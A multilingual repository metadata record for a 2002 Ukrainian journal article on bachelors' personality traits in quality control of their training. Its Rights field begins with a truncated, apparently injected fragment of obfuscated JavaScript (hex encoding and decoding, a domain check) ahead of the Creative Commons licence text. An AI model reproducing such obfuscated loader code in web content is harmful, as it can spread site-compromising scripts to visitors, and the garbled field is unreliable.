Record Details

Психологические особенности личности бакалавра в педагогическом процессе контроля качества фундаментальной подготовки

Наукові журнали Національного Авіаційного Університету

View Archive Info
 
 
Field Value
 
Title Психологические особенности личности бакалавра в педагогическом процессе контроля качества фундаментальной подготовки
PSYCHOLOGICAL FEATURES OF THE BACHELOR'S PERSONALITY IN THE PEDAGOGICAL PROCESS OF QUALITY CONTROL OF FUNDAMENTAL TRAINING
ПСИХОЛОГІЧНІ ОСОБЛИВОСТІ ОСОБИСТОСТІ БАКАЛАВРА В ПЕДАГОГІЧНОМУ ПРОЦЕСІ КОНТРОЛЮ ЯКОСТІ ФУНДАМЕНТАЛЬНОЇ ПІДГОТОВКИ
 
Creator Ладогубець, H. B.; Національний авіаційний університет
 
Subject

378.14


378.14


378.14
 
Description Рассмотрены психолого-педагогические аспекты контроля качества фундаментальной подготовки бакалавров высшей технической школы с учетом ограничения субъективных действий преподавателя на результат измерения, с одной стороны, и определением психофизиологических особенностей личности каждого студента, с другой стороны. Предложено определенные виды проведения контроля качества фундаментальной подготовки бакалавров в зависимости от психофизиологических особенностей личности бакалавра.
Psychological and pedagogical aspects of quality control of fundamental training of bachelors of higher technical school are considered, taking into account the limitation of subjective actions of the teacher on the measurement result, on the one hand, and determination of psychophysiological features of each student, on the other hand. Certain types of quality control of fundamental training of bachelors depending on psychophysiological features of the bachelor's personality are offered.
Розглянуто психолого-педагогічні аспекти контролю якості фундаментальної підготовки бакалаврів вищої технічної школи з врахуванням обмеження суб ’єктивних дій викладача на результат виміру, з одного боку, та визначенням психофізіологічних особливостей особистості кожного студента, з іншого боку. Запропоновано певні види проведення контролю якості фундаментальної підготовки бакалаврів залежно від психофізіологічних особливостей особистості бакалавра.
 
Publisher National Aviation University
 
Contributor


 
Date 2021-04-05
 
Type


 
Format application/pdf
application/pdf
application/pdf
 
Identifier http://jrnl.nau.edu.ua/index.php/visnik/article/view/15347
10.18372/2306-1472.15.15347
 
Source Proceedings of the National Aviation University; Том 15, № 4 (2002); 190-194
Вестник Национального авиационного университета; Том 15, № 4 (2002); 190-194
Вісник Національного Авіаційного Університету; Том 15, № 4 (2002); 190-194
 
Language uk
 
Rights // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Автори, які публікуються у цьому журналі, погоджуються з такими умовами:Автори залишають за собою право на авторство своєї роботи та передають журналу право першої публікації цієї роботи на умовах ліцензії Creative Commons Attribution License, котра дозволяє іншим особам вільно розповсюджувати опубліковану роботу з обов'язковим посиланням на авторів оригінальної роботи та першу публікацію роботи у цьому журналі.Автори мають право укладати самостійні додаткові угоди щодо неексклюзивного розповсюдження роботи у тому вигляді, в якому вона була опублікована цим журналом (наприклад, розміщувати роботу в електронному сховищі установи або публікувати у складі монографії), за умови збереження посилання на першу публікацію роботи у цьому журналі.Політика журналу дозволяє і заохочує розміщення авторами в мережі Інтернет (наприклад, у сховищах установ або на особистих веб-сайтах) рукопису роботи, як до подання цього рукопису до редакції, так і під час його редакційного опрацювання, оскільки це сприяє виникненню продуктивної наукової дискусії та позитивно позначається на оперативності та динаміці цитування опублікованої роботи (див. The Effect of Open Access).
 

Технічна підтримка: НДІІТТ НАУ